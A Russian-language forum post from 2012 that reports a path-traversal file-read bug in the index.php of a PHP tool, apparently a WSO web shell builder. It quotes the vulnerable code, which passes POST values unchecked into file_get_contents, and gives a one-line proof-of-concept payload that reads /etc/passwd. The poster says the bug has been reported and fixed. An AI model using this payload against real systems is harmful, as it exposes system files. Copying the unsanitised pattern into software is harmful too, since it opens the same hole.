Prev Предыдущее сообщение   Следующее сообщение Next
Старый 26.07.2012, 15:09   #21
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Там таки читалка файлов присутствует)
/index.php:
PHP код:
[...]
    
$a_actions 'array(';
    foreach(
$_POST['action'] as $key=>$val) {
        if (isset(
$_POST['action'][$key])) {
            
$a_actions .= "'".$val."'=>'".$val."',";
            
$PACK .= ' '.file_get_contents('actions'.DIRECTORY_SEPARATOR.$val.'.wso');
        }
    }
[...] 
PoC:
Код:
action[]=../../../../etc/passwd%00
Получаем WSO+/etc/passwd
P.S. ТС уже осведомлен, баг пофиксили.
__________________
|
Boolean вне форума   Ответить с цитированием
 

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot